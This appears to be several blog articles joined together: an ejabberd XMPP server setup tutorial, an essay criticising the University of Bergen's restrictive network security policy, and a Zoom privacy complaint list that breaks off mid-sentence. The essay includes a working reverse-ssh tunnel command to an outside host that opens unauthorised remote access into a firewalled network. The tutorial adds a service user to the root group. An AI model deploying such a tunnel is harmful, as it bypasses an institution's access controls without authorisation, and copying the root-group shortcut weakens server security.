Messaging is on the rise. The new generation is more willing to send texts
than to call. Communicating with an instant messenger has a unique advantage
over good old email: you can easily exchange quick replies, resulting in a
dialogue. But there is a serious problem: many instant messengers are
commercial products built such that their "users" are in fact the exploitable
resource, with no control or choice.
Most corporations are fair providers of various products and services we
can buy. But not the "Big Tech" companies that offer "free applications,"
including instant messengers. There is, obviously, nothing free on Earth:
if you do not pay, you are the product, not the customer. The Big Tech
corporations exploit their "end users" to suck out private data, often for
further resale. Nearly all of these messengers have a centralised
architecture, and the user's account is linked to a telephone number, which
destroys privacy. The link to the telephone number is also very inconvenient:
you cannot easily get several accounts, because that requires obtaining
several mobile subscriptions. It is illogical, expensive and silly.
Centralised architecture also dictates that the communication is kept on
corporate servers, so in principle many employees can abuse their access and
read messages.
Some of these products are advertised as end-to-end encrypted. But nearly
all of them are closed source, so there is no way to check how the encryption
is implemented and whether (and when) the service owner can access private
message content. Moreover, we have evidence for the opposite: many so-called
"end-to-end encrypted" messages are actually read by AI and by human
contractors.
Even if communication is technically end-to-end encrypted, the company owns
and fully controls the server, the client application and the network traffic,
so a man-in-the-middle attack by silently swapping certificates is possible
(e.g. in the context of lawful intercept, or of unlawful abuse). Metadata
(technical information about all aspects of communication, including the
addressees, their locations, IP addresses, telephone numbers etc.) is always
accessible to the service. And metadata is often even more informative than
the message content. How such metadata is used is typically unclear. The user
has no authority here at all.
Nearly all of these messaging systems use a closed, proprietary protocol. This
means that how you use the product is completely controlled by the owner
company. The only way to use the product is the official application; you
cannot choose for yourself which application program to use. This is
fundamentally different from email, for example, where you can use the
provider's web interface, its mobile app or any of the many available email
applications such as Thunderbird or
K-9 Mail. With such a third-party application you
can easily consolidate several email accounts in one place and make use of
functionality the provider does not offer, such as end-to-end encryption.
Another major problem is monopoly and lack of interoperability. The "users"
(in reality, the exploited resource) are completely confined to the owner's
platform and cannot communicate with other (especially competing) platforms
(e.g. Facebook to Snapchat); this keeps users within the silo. It is as if you
were unable to call or send SMS across different mobile operators. And this is
silly. To break down monopoly and ensure fairer competition and
interoperability across services, the EU has developed the Digital Markets
Act (DMA) regulation.
This is a big step, but it does not solve many of the problems with
centralisation, privacy and regular security flaws.
Take back your freedom, privacy and security
So, why use restricted, inconvenient, monopolistic, insecure and non-private
platforms for the trivial task of sending instant messages? There are several
ways to set up one's own privately controlled instant messaging system, most
notably XMPP and Matrix. XMPP is
lightweight, easy to install, and more private and
secure, yet it covers all the typical
instant communication purposes: text, file sharing and voice. Moreover, XMPP
servers are federated by default:
it is easy to send messages across different servers, just as with email.
There are many different applications for all operating systems and
platforms from which the user can choose. Update: XMPP can
communicate with the federated Matrix network because ejabberd now implements
a Matrix gateway.
It is very easy to set up one's own XMPP server for a small group, a company,
the family or just an individual. You will need
two things:
-
A server that will be the central hub of the communication network, running
24x7. This can be anything, from a Raspberry Pi in a cupboard to a Virtual
Private Server
(VPS) somewhere in a data centre, or just an old PC running in your
basement. A small-scale VPS suitable for an XMPP server can be very cheap,
up to about three euros per month. There are even cheaper options, such as
EUR 6 per year. There are also dedicated search engines
to help locate cheap VPS offers, e.g. LowendBox
and ServerHunter.
A typical operating system for the server is Linux (very secure,
highly configurable, free and open source).
-
A domain name that will be used to connect to the XMPP server. A domain
can be registered to the user (e.g. myname.no), which costs about 30 euros
per year. But a sub-domain can be obtained for free using
https://freedns.afraid.org or similar "free
DNS" services. In the latter case you might have something like
myownchat.mooo.com
or myownchat.ptchat.net.
Freenom offers free domains ending in .tk, .ml, .ga, .cf and .gq.
It is possible to run the XMPP server purely on an IP address, even
without a domain name, but this is much less convenient (e.g. federation
with other servers is then lost).
Given that you have a server (VPS or dedicated machine) and the domain,
configuring an XMPP server is as easy as 1-2-3. There exist several Linux
variants (distributions) with different management commands (usually for
installing software). I assume Debian Linux
below (the same commands also work for Ubuntu and other Debian-based
Linux systems).
1. Install XMPP server software
Login. When you have got a server of any kind, you need to log in
to it, typically with ssh:
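ssh debian@1.2.3.4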
here the user name on the server is debian
and the server IP
is 1.2.3.4
. Typically, you may need to create an ssh key and
upload it to the server to authenticate (refer to the server documentation,
e.g. this).
I assume logging in is not a problem.
Prepare server. First of all, update the software on the new server
sudo apt update -y && sudo apt-get upgrade -y
Install some useful monitoring and security-enhancing utilities
sudo apt install -y mc htop atop nload nmon tree zip pwgen fail2ban dnsutils iptables-persistent locate unattended-upgrades
Install certbot, a system that manages the
TLS certificates
for secure connection
sudo apt -y install certbot
Install the ejabberd server, which is very
reliable and light on resources
sudo apt install ejabberd
Firewall. To allow incoming network access to this server by XMPP
clients and also by third-party servers, you need to configure
the firewall rules. This can be done differently in different
installations. For example, some VPS providers offer a friendly web
interface for this. The standard Linux firewall is managed via iptables.
The XMPP system requires incoming access via ports 5222, 5223, 5269, 5443,
5280 and 3478. To determine the ports, refer to the listen section of the
XMPP configuration file below.
sudo iptables -A INPUT -p tcp --dport 5222 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 5223 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 5269 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 5443 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 5280 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
# STUN is over udp
sudo iptables -A INPUT -p udp --dport 3478 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
Port 7777 is used by the proxy for peer-to-peer (bytestream) file
transfer. If peer-to-peer file sharing is intended for use, an additional
rule should be set allowing incoming connections:
sudo iptables -A INPUT -p tcp --dport 7777 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
To see which firewall rules are in effect, issue this:
iptables -L --line-numbers
It makes sense to save the iptables rules so they automatically take effect
again after a reboot:
sudo sh -c 'iptables-save > /etc/iptables/rules.v4'
2. Configure your XMPP server
Secure connection certificate. Get a free
Let's Encrypt
TLS certificate.
I assume you have got a free domain myownchat.ptchat.net
from
https://freedns.afraid.org.
Note that ejabberd can manage (issue and update) TLS certificates on its
own, but this needs some configuration as described in the
acme
configuration option:
https://docs.ejabberd.im/admin/configuration/basic/#acme.
An advantage of the standalone certificate management system (as here) is
that it is slightly less tricky and can easily be used with a
web server on the same machine.
Why not also configure a web server for a small static web site here?
Ejabberd is very lightweight and will happily coexist with many other
servers running on the same machine.
sudo certbot --standalone certonly -d myownchat.ptchat.net
This command will ask a few questions and issue a TLS certificate. The process
is done over HTTP, so port 80 must allow incoming connections. If it does not,
use the following command:
sudo iptables -A INPUT -p tcp --dport 80 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
Do not forget to save the iptables rules with iptables-save
as above.
The certificate files are located in the
/etc/letsencrypt/live/myownchat.ptchat.net/
directory (e.g. fullchain.pem and privkey.pem).
For the sake of security, the certificate directories are by default not
accessible to anyone except the admin (root) user. But this prevents the XMPP
server ejabberd from accessing the certificate. This can easily be fixed with
the following commands.
First, add the ejabberd user to the root group:
sudo adduser ejabberd root
Second, allow group access to the certificate directories:
sudo chmod g+rx /etc/letsencrypt/live/myownchat.ptchat.net
sudo chmod g+rx /etc/letsencrypt/live
sudo chmod g+rx /etc/letsencrypt/
Configure ejabberd. Once the preparations are done, it is time to
configure the ejabberd messaging server. Edit the configuration file
(assuming the mcedit text editor is used):
sudo mcedit /etc/ejabberd/ejabberd.yml
This is a long configuration file that may look scary, but in fact only a few
changes are required to get the server running with the default options. Note
that the indentation is important; try to keep it as in the original file.
Any line starting with #
is treated as a comment, which can be used
to disable specific options by "commenting them out."
First, set up the host name that is used for the server, it is the same as
the domain:
hosts:
  - myownchat.ptchat.net
Second, configure the location of the TLS certificates that are used by the
server:
certfiles:
  - "/etc/letsencrypt/live/myownchat.ptchat.net/fullchain.pem"
  - "/etc/letsencrypt/live/myownchat.ptchat.net/privkey.pem"
Configure the admin users who can manage the XMPP server:
acl:
  admin:
    user:
      - "myname": "myownchat.ptchat.net"
Then, add the configuration for the HTTP file upload module, which allows file
sharing (sending files):
  mod_http_upload:
    put_url: https://@HOST@:5443/upload
    custom_headers:
      "Access-Control-Allow-Origin": "https://@HOST@"
      "Access-Control-Allow-Methods": "GET,HEAD,PUT,OPTIONS"
      "Access-Control-Allow-Headers": "Content-Type"
It is convenient to keep the latest messages on the server; this is done with
the "mam" (message archive management) module:
  mod_mam:
    assume_mam_usage: true
    default: always
Ejabberd supports several other communication protocols in addition to
XMPP. For example, it also works with MQTT, which is
typically used for IoT devices. If this functionality is not needed,
just comment out the MQTT module to disable it.
The STUN and TURN protocols are mainly used for voice calls and need the
actual IP address of the server (replace it with your server's IP address):
  -
    port: 3478
    ip: "::"
    transport: udp
    module: ejabberd_stun
    use_turn: true
    ## The server's public IPv4 address:
    turn_ipv4_address: "1.2.3.4"
An important issue is whether to allow anonymous registration of new users.
I strongly recommend not allowing this for security reasons. For a small
private server, you will normally add users manually and set their initial
passwords. Every user can then change the password within the client program.
So, you need to disable mod_register
by commenting it out:
# mod_register:
# ## Only accept registration requests from the "trusted"
# ## network (see access_rules section above).
# ## Think twice before enabling registration from any
# ## address. See the Jabber SPAM Manifesto for details:
# ## https://github.com/ge0rg/jabber-spam-fighting-manifesto
# ip_access: trusted_network
Start the server! And that is all the minimal configuration. Now it is time to
start the server:
sudo systemctl start ejabberd
If there are any errors and the server fails to start, Linux logs can be
inspected with this command:
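sudo journalctl -xe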
or logs for only ejabberd:
sudo journalctl -xe --unit ejabberd
Additional stuff. The above is enough to get the XMPP server running for
text. If voice is required, you also need to configure DNS as described here:
https://www.process-one.net/blog/how-to-set-up-ejabberd-video-voice-calling/.
DNS is normally configured using the control panel of the domain registrar.
The TLS certificate managed by certbot
is renewed every 90 days. This is an automatic process, but the ejabberd
server must be told when the certificate changes. This can be done using a
deploy hook. Just create the hook file reloadxmpp.sh
(the file name can be
anything):
sudo mcedit /etc/letsencrypt/renewal-hooks/deploy/reloadxmpp.sh
and add the following commands:
#!/bin/sh
ejabberdctl reload_config
This file must be executable, so issue this command:
sudo chmod ugo+x /etc/letsencrypt/renewal-hooks/deploy/reloadxmpp.sh
A last note on the server: it should be regularly updated for
bug fixes and security patches. This is done automatically by the
unattended-upgrades
package installed above. Still, it is good practice to log in regularly
over ssh, check the logs and update the system:
sudo apt update -y && sudo apt-get upgrade -y
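If automatic updates were not enabled when the package was installed, the standard Debian way to switch them on is (this assumes the unattended-upgrades package installed earlier):
sudo dpkg-reconfigure -plow unattended-upgrades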
3. Configure the XMPP users and client application
Register new users. First, you need to register the XMPP users. The
quickest method is to use the command line on the server; the
ejabberdctl
command provides the administrative functions.
A secure random password can be generated with pwgen
, e.g. the following
generates passwords of 18 symbols:
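pwgen -s 18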
It normally generates an array of possible passwords to choose from.
Now, register the user myname
; this is the admin user configured in the main
configuration file /etc/ejabberd/ejabberd.yml
above.
# user domain password
sudo ejabberdctl register myname myownchat.ptchat.net pee8chogh9Heel6hei
Other users can be configured similarly. Note that the full user name for XMPP
has the same format as an email address: myname@myownchat.ptchat.net
. This is due to
the federated nature of both systems: you need to know both the user and
the server with whom to communicate.
For this example let's register two additional users:
sudo ejabberdctl register john.dow myownchat.ptchat.net ohyeeLeefo9yief4gu
sudo ejabberdctl register anna.karenina myownchat.ptchat.net hejo7phiy2iFeW9She
Use! The final step is to configure the client program on the
user's device. The biggest difficulty at this step is the abundance
of choice. For any major platform, one can choose any of the many
available XMPP client programs. Some email
programs, e.g. Thunderbird, also support
XMPP (although only a limited subset of features). Check out
https://xmpp.org. The configuration for the client
is simple:
-
Server: your server, in the example above it is myownchat.ptchat.net
-
User name: your user name. In the example we used above, it can be
myname
Note that the option to create a new account must NOT be enabled, since
the account has already been created on the server and in-band
registration (mod_register
, see above) is disabled for
security.
Some programs accept the full user name instead of the user and domain
specified separately. Then the user is just myname@myownchat.ptchat.net
. If you
plan to use peer-to-peer (bytestream) file transfer (this is not mandatory),
you should also find where the file transfer proxy is
configured and set it to the proxy
subdomain; for our example it should be
proxy.myownchat.ptchat.net
. And that is all for the basic client configuration.
I recommend the Blabber XMPP application for
devices running Android. Yaxim is the best option for
minimalists: it is remarkably small (only a few megabytes) and works great
even on the oldest and weakest devices. Miranda NG
is a powerful XMPP client program for Windows. There are also a few
web-based clients, https://conversejs.org/ and
https://web.xabber.com/, that you can try right
away without installing anything.
The final step is to fill the contact list (called the roster) with the
addresses of the people (or maybe devices, because XMPP can easily be
configured for bots accepting commands). Just remember that the address is the
full name, as in email: user@server.domain
. One useful option is so-called Shared roster
groups: with them you can configure
a group of contacts without the need to add each one manually.
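As a hedged sketch (assuming the mod_shared_roster module is enabled; the exact arguments vary between ejabberd versions, so check ejabberdctl help srg_create on your server), a shared group visible to everyone could be created roughly like this:
# create a shared roster group "family" on the example host and add a member
sudo ejabberdctl srg_create family myownchat.ptchat.net Family "Family group" family
sudo ejabberdctl srg_user_add anna.karenina myownchat.ptchat.net family myownchat.ptchat.net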
Happy chatting!
Further
There are many advanced options and possibilities in ejabberd. Just check
the official web site https://www.ejabberd.im/
and the documentation at https://docs.ejabberd.im/.
There are also a few useful tutorials, e.g.
https://www.process-one.net/blog/how-to-move-the-office-to-real-time-im-on-ejabberd/
Main points
-
Any major university IT infrastructure is huge and heterogeneous. It is
used by lots of people, many of whom are experimenters and explorers
who like a challenge, rather than office robots. Most users are busy,
focus on research and study, and hate additional (and especially sudden)
hassle. This is why consideration of the usability cost is absolutely
critical for an IT security strategy.
-
Creating a walled "trusted" area behind a firewall--the perimeter model--is
an outdated approach to security in the age of universal zero-trust
deployment. Instead of following an already outdated approach, a more
sensible strategy is to start implementing components of the zero-trust
model, including score-based trust and wide use of personal identity
hardware tokens.
-
The major focus in security should be shifted from technology components
alone to the end users, creating incentives to use more secure technology
rather than adding hassle.
The great firewall
There has been a very rapid trend towards increasingly restrictive IT policies
at the University of Bergen, implemented from October this year. While the aim
of "increasing security" is laudable, I think the planning and implementation
of the policies has several flaws which may compromise that declared aim. The
biggest problem is that the UiB IT environment is huge and heterogeneous.
There is a variety of services with different levels of security risk, and
many users with diverse needs, use cases, environments, competences, personal
backgrounds and personalities. This requires a more sensible, flexible and
inclusive approach. Without it, rigid policies will not make
the IT environment significantly safer. Instead, they may hamper normal work
for some users and, in the long run, compromise both security and privacy,
contrary to the declared aim.
Security, including computer security, is not a fixed state; it is
rather a continuous process. Security is not limited to IT
technology, and technology alone cannot bring security. Security is primarily
a human rather than a technical problem. Indeed, the most dangerous security
breaches did not target encryption algorithms, and many only partly involved
exploitation of software and hardware vulnerabilities. They typically make
use of human factors, such as social engineering, trust exploitation, human
mistakes and so on. Successfully tracking and catching cyber criminals also
rarely targets technology primarily; it usually depends on exploiting
human errors, negligence, laziness and similar factors. This is why the
current primary focus on merely restricting the IT environment technologically,
aimed at little more than isolating it from outside networks, is neither
sufficient nor efficient. A more balanced, flexible and holistic approach is
needed.
Security can only work in balance with usability. Moreover, there is
often a trade-off: technological security restrictions often make for worse
usability. A completely "sealed" environment would simply be too restricted
to be usable. Usability is indeed a primary factor: research shows that many
security problems, and users' hesitance or unwillingness to use
(more) secure tools, are caused by their imperfect usability. Furthermore,
within a hugely heterogeneous environment there is no single optimal
balance between security and usability. An important consequence of this
is that a flexible and inclusive approach to security, aimed at different
degrees of balance with usability, is essential.
The technical part of security should start from, and primarily respond to,
specific threat model(s), not theoretical or vaguely possible risks. And the
threat model(s) should be connected with real-life statistics, e.g. how many
breach attempts usually occur, against which services, from which IP
addresses etc. It does not make sense to install solid steel screens on
all windows of our department building to make it "more secure" against
any kind of possible breach; even if there are crowds of hungry zombies
walking outside, it is enough to protect the first floor.
The blanket, unconditional restriction of the UiB IT network environment now
being implemented does not seem to respond to any specific consideration of
threat model(s), or of the variety of users, needs, sub-environments etc. It
looks like a desperate attempt to seal everything in the hope that a jailed
environment, isolated from the outside, will be more secure. This is a wrong
assumption.
Some specific problems
Multi-factor authentication via TOTP: Not a panacea.
KI 0780 introduced the multi-factor authentication policy. This is generally a
crucial component for improving security, if implemented sensibly. However,
not all implementations automatically improve security or provide a sufficient
balance between security and usability. What is called "multi-factor
authentication" may not even be truly multi-factor. The definition
of multi-factor authentication involves the use of several things for
authentication: typically something you know (a password), plus something you
own (e.g. a mobile device or SIM) and something you are (e.g. a fingerprint).
If the password is entered using password manager software stored on the
mobile device and the "multi-factor" SMS comes to the same mobile device
(or the password is entered and the SMS read on the same computer that is
linked to the smartphone, as is now the norm within the Apple ecosystem), the
whole idea of two factors is defeated: the smartphone becomes the single
authentication device. It can at best be called "two-step authentication," a
weaker mechanism. SMS (and anything based on a phone line or phone number) is
actually one of the poorest authentication means due to the long-known and
essentially unsolvable vulnerabilities in GSM, SS7 and other related
protocols. SMS can be hijacked by malicious smartphone apps (e.g. the Google
Play store does not even approach 100% safety; there are occasional scandals
involving malware in apps with very substantial audiences) or even on basic
GSM dumb phones (there are reports of quite a few Chinese-made GSM button
phones shipping with factory-installed malware). Worse still, some modern and
widespread multi-factor mechanisms such as push-based popups are also easily
exploited (even worse, they create a bad habit of clicking "approve" without
thinking). If authentication is done on a web page, it is usual to save
an authentication cookie to avoid repeated two-factor prompts. However,
cookies are not necessarily secure: long-lived cookies might be hijacked by
malware, there is the well-known mechanism of CSRF attacks, and there is also
a big privacy drawback (e.g. tracking). The current industry trend is to move
away from the cookie mechanism in mainstream browsers (e.g. Google Chrome
will not allow any third-party cookies from 2022). A sensible user policy is
to reduce the lifetime of any cookie. However, this makes the "two-step"
authentication as currently implemented at UiB a hassle. Indeed,
the user then has to go through the SMS code process nearly every time he
or she logs in, even if it is done from the same IP address and the same
device.
The ssh access to the login.uib.no
server has apparently disabled the
best-practice secure mechanism of ssh-key authentication (incidentally,
if the key is combined with a passphrase, it is actually two-factor
authentication in itself!) and forces the potentially weak password-based
mechanism with an SMS code. There seems to be no one-time code mechanism
other than SMS at the time of writing!
A better mechanism is to use a time-based one-time password (TOTP)
authenticator application on the mobile phone. This is in fact recommended on
the Microsoft and UiB web pages as a more secure alternative (via the
Microsoft Authenticator app). While TOTP is better than SMS, it is far from
perfect, because it is potentially vulnerable to phishing and MITM attacks,
and the secret seed must be kept in the authenticator application as well as
on the server to make synchronised generation of TOTPs possible.
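To illustrate why the shared seed matters, here is a small sketch (assuming the oath-toolkit package and a made-up base32 seed): anyone who obtains the seed can compute exactly the same codes as the phone does.
# prints the current 30-second TOTP code for this (example) seed
oathtool --totp -b JBSWY3DPEHPK3PXP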
Personal hardware tokens
There is a much better and stronger two-factor authentication mechanism:
U2F and FIDO2/WebAuthn, which use a hardware security device to hold
the private key. The security token, in the form of a small USB or
NFC key, can both authenticate to the server and authenticate the server
itself with strong asymmetric cryptography, making phishing and many other
attacks virtually impossible. Many such devices also implement biometric
(e.g. fingerprint) identification in a privacy-respecting way (e.g. biometric
data never leaves the user's device). This is now a mature technology
that is implemented in all major web browsers and can be used with ssh
key-based authentication, GPG-enabled email etc.
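As an illustration (assuming OpenSSH 8.2 or newer and a FIDO2-capable token), an ssh key whose private part can only be used together with the hardware token is generated like this:
ssh-keygen -t ed25519-sk -C "hardware-backed login key"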
The best-known hardware token is probably the
YubiKey, and there are a few others on the market
(e.g. Google Titan, FEITIAN, Token2, Thetis). They are not very cheap,
but not prohibitively expensive either.
VPN needed for all, even the most essential everyday services
The UiB IT services previously offered several open and industry-standard
VPN mechanisms (IPsec, OpenVPN), so that different users could easily find a
solution that worked for them individually. Now there is a single closed and
proprietary mechanism: Cisco AnyConnect, including both a unique (SSL-based)
protocol and the software client. This mechanism may work for many,
but not necessarily for everyone (e.g. unlike open solutions, it may not
be available on some computing platforms; some enthusiasts of open
source might find restriction to a single proprietary tool unethical;
etc.). There are reports of unreliable connections with Cisco AnyConnect,
and that OpenVPN was previously more stable for some users. This is indeed
likely if Cisco AnyConnect is used in certain restrictive environments
with DPI that block connections to certain ports or UDP traffic even on
port 443, or otherwise censor VPNs (e.g. some public WiFi networks may
have such limitations). OpenVPN, in contrast, can be configured or combined
with obfuscation layers (e.g. shadowsocks) to mimic normal SSL web traffic and
work even behind the Great Chinese Firewall. There is a clear benefit, at not
prohibitively high cost, in providing at least some limited support for such a
mechanism for certain users (e.g. with special needs, or during travel). It
might even be provided only on special request with some substantiation. Also,
the reliability statistics used internally by the IT department might be
biased if not all users report minor and transient VPN issues. So there is a
case for deploying and supporting alternative VPN solutions, perhaps even on a
smaller scale.
It sounds quite reasonable that providing and supporting a wider choice of VPN
solutions for a minority of users would not be economically feasible. However,
that no longer holds when just about all services become available
only from within the UiB internal network jail. Then there should be more
flexibility and inclusion: several ways for a variety of users in different
environments to get into the jailed environment comfortably. It is simply too
unbalanced a limitation to mandate the use of a single restricted VPN to get
email from home or from an airport, for example. A better alternative is, of
course, to relax the policy by moving at least the most essential but
inherently secure services out of the jail.
Is the universal jail really essential for everything?
One issue with unconditionally moving all of the UiB IT services into a jailed
environment is that this does not reflect a sufficient balance between
security and usability. It is of course good to keep potentially less secure
services (e.g. RDP) jailed. But are the real threats substantial enough to
hide absolutely everything in such a jail?
Are there any real-life statistics or other data showing that accessing
the university email system from an IMAP client with normal SSL/TLS protection
can be dangerous? The user in such a case does not need to enter the UiB
password at login (it is saved in the software, often encrypted on the
device), so the phishing risk is near zero. The authenticity of the IMAP
server certificate is checked through the standard SSL mechanism. So is there
any real security advantage in moving such an essential everyday tool as email
into the jail, or does this just introduce an additional hurdle?
Another example is connecting to the UiB login.uib.no ssh server. Many
(presumably less advanced) users use ssh with their default password. For
them, the "two-factor" authentication is a serious security improvement, of
course, even if it is in fact used in the weakened two-step mode. However,
other users can configure ssh-key authentication,
which is a much more secure mechanism. Will manual password entry with
two-factor authentication really provide a meaningful security improvement
in such a case? Will it provide anything beyond a negligible effect if the
user has already authenticated with SMS on the same device, or on a different
device from the same IP address, shortly before? Is there any improvement in
security that justifies such a degradation of usability?
The question is this: is the same level of restriction and jailing really
essential for all services, whether often or rarely used, potentially less
secure or highly secure, easy or difficult to exploit, with documented
attacks or of little interest to intruders? Does it not just impose usability
costs that are not balanced by any security improvement?
Human ingenuity: Is the jail actually made of paper?
It is clear that restricting just about everything equally and unconditionally,
especially without considering usability costs, will not automatically
increase security. The situation can well become worse: lower security as
well as compromised privacy.
For example, to avoid all the nuisance, users may switch to third-party
commercial providers, for instance increasingly using private gmail.com
accounts, Dropbox etc. Users may turn to smaller, more obscure online tools
and applications (e.g. file sharing sites and communication tools, some
advertised as encrypted) with uncontrollable and unknown security. Some of
them might be owned and run by communities and volunteers; some could be
compromised or deliberately devised to gather data, track users and spy.
Some of the more qualified "insider" users might successfully hack the system
to get nuisance-free access to the UiB jailed environment from outside. It
is actually not a hard problem. One possible solution is a reverse
ssh
proxy. It does not even require administrative rights and can be set up
by a motivated average-level computer user after 20 minutes of reading the
ssh
manual. More advanced users can create stable backdoors, implementing
such things as proxy jumps and port forwarding, that survive reboots,
logouts etc. It is also easy to add various layers of plausible deniability
and obfuscation.
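As a minimal sketch of how little is needed (the host names are made up for illustration): a single command run on a machine inside the jail keeps a tunnel open to an outside machine, from which the insider can later ssh back in.
# run on a machine inside the jailed network; myvps.example.org is any outside host
ssh -fN -R 2222:localhost:22 user@myvps.example.org
# later, from the outside host: ssh -p 2222 localhost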
There are many more tools, ways and possibilities to implant and efficiently
hide a backdoor into the UiB jailed environment. All that is required is
various open source components freely available on the net and an incentive
to take such unauthorized actions. This is not just an abstract theoretical
threat, but a real and serious risk left behind by the current jailing policy.
Imposing a jailed environment without considering the trade-off with
flexibility and usability has one big problem: it may create an incentive to
break the rules to make life more hassle-free. A related and serious problem
is that the IT department would not be able to control this and in most
cases will remain unaware of the issue. It is virtually impossible to detect
that users communicate and share sensitive medical or personal data over a
private Google mail account, for example. A cryptic backdoor implanted on
a computer within the UiB jail with sufficient plausible deniability can
remain undetected for a long time without costly and tedious forensic
analysis. But such an analysis will be conducted only by the police, after a
catastrophic break-in has occurred, too late.
There are many advanced users and smart students at the university. Many
understand well (and they do discuss!) the inconsistency of the restrictive
jail policies. Some people may find it quite fun to overcome silly rules that
impose unneeded hassle. It can indeed be an interesting challenge but,
unfortunately, also an additional incentive.
A further problem is that many users usually do not bother to report
smaller or transient problems through the normal issue tracking channels such
as hjelp.uib.no. They may not be acquainted with them, or may just consider
them a hassle if they are very busy (and they are too busy with real work to
hang on tangential IT problems). A quite typical course of action is to ask
someone nearby for help or a workaround. Therefore, if the knowledge of
how to implant backdoors, and the obvious fact that it is quite
easy and just solves the problem, spreads among students and staff,
it can create a real security disaster. Unfortunately, backdoor skills are
very likely to spread if the IT department keeps making the jail ever more
restrictive and keeps providing more incentives to break the rules. Then it
would become essential to tighten the jail further: inspect all devices on
entry and refuse entry to everyone with IQ > 0.60. The simple fact is that the
jail that is being so happily built is not made of rock and steel; it is made
of paper.
The situation at UiB is quite different from the typical commercial
organization that the standard security recipes are written for. There
are many brilliant students and staff here; many are young and like
challenges. There may be those who would not hesitate to take the risk, given
that the benefit of making one's own hassle-free environment is high, the cost
is zero, and the expected risk is rather low. Making a backdoor is also a
fun way of learning technology, which is yet another incentive. Many
folks are already aware of the various software tools and know how to use
their black magic. People are ingenious, and people at UiB are on average much
more ingenious than outside. What is the threat model behind the jailed IT
environment? Is it to protect UiB from outside hackers? That is the wrong
model, because many such hackers are already inside the jailed environment,
ready to take up the challenge of punching its feeble paper walls from within.
What should be done?
The inconsiderate and inflexible jailing of the UiB IT networks should
certainly be slowed down before it is too late and people start using
third-party tools and making their own unauthorized solutions. There should be
a serious analysis of what must be implemented and over which time scale, so
that users can get acquainted with it and are not suddenly hit with huge
hassle. As of now, the "analysis" seems to be mainly focused on "what suddenly
broke once we put everything into a jail"; this is not acceptable. The
policies should not be based mechanistically on some manual made for a
different type of environment; they should be inclusive and flexible enough to
adapt to the complex, diverse and heterogeneous UiB environment. The main
focus should switch from technology to people: how to reach most of them
(they are busy!), make security improvements minimally obtrusive, and teach
very busy people sufficient security skills without much hassle. Specifically,
the most important information should not be sent via a global mailing list
that may disappear into a user's mail filter, but should be addressed
personally to each user (it is not prohibitively hard to write a script for
this, substituting %NAME%
with the real user's name).
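A minimal sketch of such a script, assuming a hypothetical users.txt with one "name email" pair per line, a template.txt containing the %NAME% placeholder, and a sendmail-compatible mail command on the system:
#!/bin/sh
# Send a personalised copy of template.txt to each user listed in users.txt
while read -r name email; do
  sed "s/%NAME%/$name/g" template.txt | mail -s "Upcoming IT security changes" "$email"
done < users.txt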
The technological part of the solution should develop sensible threat models
based on attack and usage statistics. It should be governed by real risks
rather than by the desire to just protect everything quickly and at all costs.
Some of the restrictions already applied could be relaxed. A reasonable
solution is to apply a more sensible score-based security mechanism, e.g.
including IP-based rules for two-factor or two-step authentication. Some of
the more secure services could, for example, be available without firewall
restriction if the user comes from his or her frequently used Norwegian home
IP address (improving usability while still reducing the potential attack
surface). This effectively transforms the jail into a continuum that adapts to
the threat and uncertainty level. It would also pay off to demonstrate the
practical benefits of client-side certificate authentication, OAuth2 and
similar, more phishing-resistant, security token mechanisms (e.g. they can
relax the need for TOTP/SMS authentication) to all users. The university
should also facilitate much wider use of hardware-based authentication
devices, such as the YubiKey, for proper two-factor authentication, perhaps
even distributing such devices freely in some groups if universal deployment
turns out to be too expensive. Such personal identity verification hardware
devices are actually a crucial component of modern zero-trust security
approaches.
The crucial element of the whole policy is to create incentives for using
more secure tools. For example, the use of hardware personal identity
verification tokens should allow users to bypass all or most restrictions,
perhaps even the need for a VPN. There would currently be little added risk
with such a policy, but users would be much happier to do their work
securely whenever they need to, without hassle. This would require hard work,
additional integration and funding. But educating, helping and cooperating
with users, not restricting and obstructing them, is the only viable
strategy for achieving increased security in the university environment in
reality, not just on paper.
Zoom privacy and security problems
Zoom has demonstrated significant negligence with respect to
cybersecurity. Additionally, the company has run aggressive marketing
campaigns and was caught providing false information to its end users.
-
Zoom aggressively pushes the user to download and install the native
application rather than use the web browser for videoconferencing, even
though videoconferences work in the browser. This is a little
suspicious. Browser-based conferences are more convenient for an occasional
user and are safer due to browser sandboxing of network applications.
-
A serious security deficiency on the Apple Mac platform allowed
any unauthorized remote attacker to activate the web camera, connect
the user to a conference and execute a denial-of-service attack. Zoom tried
to ignore and deliberately hide information about this very serious
security vulnerability and was slow to fix it.
See here for more details,
and here
(technical information is
here and
here).
Zoom management's response seems to point to a quite irresponsible corporate
culture.
-
More recently it emerged that Zoom was sending users' data
to Facebook servers without the users' consent. This is now fixed. See
the Vice article
and this follow-up.
-
Zoom was caught providing false and misleading information, claiming that its
videoconferences have "end-to-end" encryption while this was not so. Check out
this. The explanation provided by Zoom is unsatisfactory.
-
Zoom had a serious security vulnerability that could lead to a
user password leak on Microsoft Windows.
See here for details.
-
Zoom has a strange privacy policy that, even though it states that "privacy
is very important to us," requires quite extensive collection of private user
information. There is little explanation as to why this information
is collected. Unlike many other similar companies, Zoom does not release
transparency reports. See here: https://zoom.us/privacy
-
The Electronic Privacy Information Center has filed a complaint with the FTC
alleging that the videoconferencing company Zoom has committed unfair
and deceptive practices in violation of the FTC Act. According to EPIC,
Zoom intentionally designed its web conferencing service to bypass
browser security settings and remotely enable a user's web camera
without the knowledge or consent of the user.
-
See more details here
-
There is growing concern about the privacy deficiencies in Zoom;
for more details see this and
this.
Also see The Guardian.
-
Recently SpaceX banned Zoom because
of privacy concerns; see
here for details.
-
Zoom has close links with China. Even though the intellectual property,
management and marketing are based in the USA, many if not most developers and
engineers are based in China (see the Form S-1 registration statement). This
can potentially lead to serious privacy and cybersecurity issues, given
the Chinese regime's tightening of Internet regulation (censorship, privacy
etc.). One example is the MLPS 2.0 legislation of 2019, which mandates that
companies operating in China, including foreign ones, give the authorities
